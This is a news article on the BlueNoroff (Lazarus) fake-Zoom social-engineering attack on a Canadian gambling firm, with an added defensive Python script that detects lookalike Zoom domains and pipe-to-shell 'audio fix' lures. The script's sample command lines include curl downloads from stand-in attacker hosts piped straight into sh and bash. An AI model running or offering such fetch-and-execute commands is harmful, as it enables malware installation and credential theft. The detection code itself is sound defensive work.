
Canada Gambling Firm Hit by Lazarus Hackers via Zoom Call

  • BlueNoroff allegedly used a fake Zoom domain to deceive the Canadian gambling firm
  • Breach allowed hackers to extract data including browser data and user keychain files
  • Attack appears to be part of a broader Zoom scam first spotted in March 2025
North Korean state-sponsored hacking group Lazarus has scammed a Canadian online gambling firm. [Image: Shutterstock.com]

Lazarus returns

An Ottawa cyber security firm has revealed that an unnamed Canadian online gambling company was recently targeted by a subgroup of the North Korean state-sponsored hacking collective, the Lazarus Group.

According to security firm Field Effect, the Lazarus subgroup BlueNoroff used “social engineering tactics to take control of a victim’s computer and deploy infostealer malware” via a Zoom call.

Trojan horse posing as a Zoom audio repair tool

BlueNoroff allegedly used a fake Zoom domain to deceive the Canadian gambling firm during a scheduled cryptocurrency-related Zoom meeting. Citing audio problems on the call, the attacker convinced the victim to run what was presented as a Zoom audio repair tool but was in fact a malicious Trojan horse script.

Field Effect stated the hackers got away with “sensitive personal and system data, with a clear focus on cryptocurrency-related assets.”

Elaborate scam

A news release revealed that BlueNoroff duped an employee of the Canadian gambling firm by impersonating trusted contacts and setting up a website that posed as a Zoom support page.

The hackers used deepfake technology to pass as a trusted business contact.

“During the call, the victim experienced audio issues and multiple pop-up warnings. The other participant then prompted the victim to run a script masquerading as a Zoom audio repair tool,” stated Field Effect. 

Once the first script ran, a second script kicked in and prompted the employee for credentials. Field Effect said the hackers then used those credentials in subsequent commands to download and execute “an infostealer and a loader for a fully featured malware implant.”

The breach allowed BlueNoroff to extract sensitive information from the gambling firm, including “browser data and user keychain files.” 
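The chain above rests on two things a defender can check for directly: a “Zoom” link whose host is not actually a Zoom domain, and a shell command that fetches a “fix” script from such a host and executes it straight away. The following is an added example written for this page, not Field Effect’s tooling or anything from the attackers’ kit. The allowlist of genuine Zoom domains (zoom.us, zoom.com) and the lure keywords are assumptions, and the command lines it scans are constructed samples, not real telemetry from the incident.

```python
"""Two lightweight checks for the Zoom-lure pattern (added example).

1. is_genuine_zoom_host(): trust a meeting/support link only if its host is
   zoom.us or zoom.com or a subdomain of one of them. Lookalikes such as
   zoom-support-help.example or zoom.us.evil.example are rejected.
2. find_fix_script_lures(): scan command lines (e.g. from EDR or shell
   history) for a download from a non-Zoom host that is piped straight into
   a shell (or wrapped in osascript) and carries a "fix/repair/audio" lure.
"""
import re
from urllib.parse import urlsplit

# Assumption: the only domains a real Zoom client or support page lives on.
GENUINE_ZOOM_DOMAINS = ("zoom.us", "zoom.com")

URL_RE = re.compile(r"https?://[^\s'\"<>|]+", re.IGNORECASE)
DOWNLOADER_RE = re.compile(r"\b(?:curl|wget)\b", re.IGNORECASE)
# "| sh", "| bash", "| zsh", or an osascript wrapper: the payload is executed, not saved.
EXEC_RE = re.compile(r"\|\s*(?:ba|z)?sh\b|\bosascript\b", re.IGNORECASE)
# Assumption: lure words the article's "Zoom audio repair tool" pretext would use.
LURE_RE = re.compile(r"zoom|audio|fix|repair|sdk|update", re.IGNORECASE)


def is_genuine_zoom_host(url: str) -> bool:
    """True only if the URL's host is a genuine Zoom domain or a subdomain of one.

    Uses the parsed hostname, so "https://zoom.us@evil.example/" resolves to
    evil.example and is rejected, as are "support-zoom.us" and "zoom.us.evil.example".
    """
    if "://" not in url:          # accept bare "zoom.us/j/123" style links too
        url = "https://" + url
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in GENUINE_ZOOM_DOMAINS)


def find_fix_script_lures(cmdlines):
    """Return the command lines that download from a non-Zoom host, execute the
    download directly, and mention a lure word; each hit records the rogue URL."""
    hits = []
    for line in cmdlines:
        urls = URL_RE.findall(line)
        rogue = [u for u in urls if not is_genuine_zoom_host(u)]
        if (rogue and DOWNLOADER_RE.search(line)
                and EXEC_RE.search(line) and LURE_RE.search(line)):
            hits.append({"cmdline": line, "url": rogue[0]})
    return hits


# Constructed sample command lines for this example (not real incident data).
SAMPLE_CMDLINES = [
    # the lure: a "Zoom audio fix" fetched from a lookalike host and piped to sh
    "curl -fsSL https://zoom-support-help.example/audio_fix.sh | sh",
    # a genuine client download saved to disk, not executed
    "curl -fsSL https://zoom.us/client/latest/Zoom.pkg -o /tmp/Zoom.pkg",
    # the real client starting
    "/Applications/zoom.us.app/Contents/MacOS/zoom.us",
    # the same lure wrapped in osascript, as macOS dialog-driven lures often are
    "osascript -e 'do shell script \"curl -s https://us05web-zoom.example/sdk/repair | bash\"'",
    # a pipe-to-shell installer with no Zoom/audio pretext: not flagged by this rule
    "curl -fsSL https://example.com/install.sh | sh",
]

if __name__ == "__main__":
    for hit in find_fix_script_lures(SAMPLE_CMDLINES):
        print(f"LURE  {hit['url']}\n      {hit['cmdline']}")
```

The host check deliberately parses the URL rather than searching for the substring “zoom.us”, because userinfo tricks (`zoom.us@evil.example`) and prefix/suffix lookalikes defeat substring matching. The command-line rule is intentionally narrow (download from a non-Zoom host, immediate execution, and a lure word all required) so that ordinary `curl | sh` installers do not trip it; tune the lure list and allowlist to your own environment.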

Bigger picture

The cyber security firm attributed the hack to a wider Zoom scam campaign that emerged in March 2025 and is primarily focused on crypto businesses.

“It exemplifies an evolving pattern in which financially motivated threat actors continue refining their tradecraft, embedding malicious activity within legitimate business workflows and exploiting user trust as the primary attack surface,” the security company stated.

BlueNoroff’s biggest coup came in February 2016, when its malware ruse against the Bangladesh Bank let the hackers push fraudulent transfer requests from the bank’s account at the New York Fed to overseas accounts. The requests totaled almost $1bn, of which about $81m was actually moved out before the remainder was blocked.
